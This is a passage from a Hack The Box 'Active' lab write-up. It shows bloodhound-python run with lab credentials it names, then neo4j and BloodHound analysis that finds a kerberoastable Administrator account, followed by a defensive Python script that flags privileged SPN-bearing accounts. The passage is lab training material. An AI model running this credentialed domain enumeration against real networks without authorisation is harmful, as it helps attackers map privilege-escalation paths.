Bloodhound
If ldapdomaindump is considered a bird's-eye view of the target domain, BloodHound is the war-room table with the strategies and tactics laid out on it.
┌──(kali㉿kali)-[~/…/htb/labs/active/bloodhound]
└─$ bloodhound-python -u SVC_TGS@active.htb -p GPPstillStandingStrong2k18 -ns $IP -d ACTIVE.HTB -dc dc.active.htb --zip -c All
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20230131114114_bloodhound.zip
bloodhound-python is a Python implementation of the BloodHound ingestor, which allows collection to be run remotely. I can do so with the credentials extracted earlier.
Ingestion complete
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ sudo neo4j console
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
2023-01-31 10:41:33.195+0000 INFO Starting...
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ bloodhound
Firing up neo4j and Bloodhound
Ingested data has been uploaded
According to BloodHound, the administrator user is kerberoast-able. The krbtgt account is kerberoast-able by default and is disabled, as it is the KDC account. But the administrator user? This is very much an unusual case.
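To make the difference between those two hits concrete, here is an added audit script (my own, not part of the original write-up or of the BloodHound project) that reads the *_users.json from a bloodhound-python --zip archive, lists every SPN-bearing user the way BloodHound's prebuilt query does, and then separates out the ones that are both enabled and privileged. It assumes the v4 JSON layout with hasspn, enabled and admincount under "Properties"; the archive it reads is constructed inline from the account names on this page.

```python
import json
import zipfile
from io import BytesIO

# Constructed sample in the shape bloodhound-python writes to *_users.json
# (assumption: v4 layout with hasspn/enabled/admincount under "Properties").
# Account names come from the write-up; the SPN values are illustrative only.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "ADMINISTRATOR@ACTIVE.HTB", "hasspn": True,
                        "enabled": True, "admincount": True,
                        "serviceprincipalnames": ["placeholder/spn.active.htb"]}},
        {"Properties": {"name": "KRBTGT@ACTIVE.HTB", "hasspn": True,
                        "enabled": False, "admincount": True,
                        "serviceprincipalnames": ["kadmin/changepw"]}},
        {"Properties": {"name": "SVC_TGS@ACTIVE.HTB", "hasspn": False,
                        "enabled": True, "admincount": False,
                        "serviceprincipalnames": []}},
    ],
    "meta": {"type": "users", "count": 3, "version": 4},
})

def build_sample_zip() -> bytes:
    """Pack the constructed users.json into an in-memory zip, as --zip does."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("20230131114114_users.json", SAMPLE_USERS_JSON)
    return buf.getvalue()

def load_users(zip_bytes: bytes) -> list:
    """Return the Properties dict of every user in *_users.json inside the zip."""
    users = []
    with zipfile.ZipFile(BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith("_users.json"):
                payload = json.loads(zf.read(name))
                users.extend(u.get("Properties", {}) for u in payload.get("data", []))
    return users

def kerberoastable(users: list) -> list:
    """Same criterion as BloodHound's prebuilt query: any user with an SPN set."""
    return sorted(u["name"] for u in users if u.get("hasspn"))

def needs_attention(users: list) -> list:
    """SPN-bearing accounts that are enabled AND privileged (admincount): the
    administrator case from the write-up. The disabled krbtgt drops out here."""
    return sorted(u["name"] for u in users
                  if u.get("hasspn") and u.get("enabled") and u.get("admincount"))
```

Run against a real archive by passing the zip's bytes to load_users; anything returned by needs_attention is a service account password that protects a privileged identity and should be rotated or moved to a gMSA.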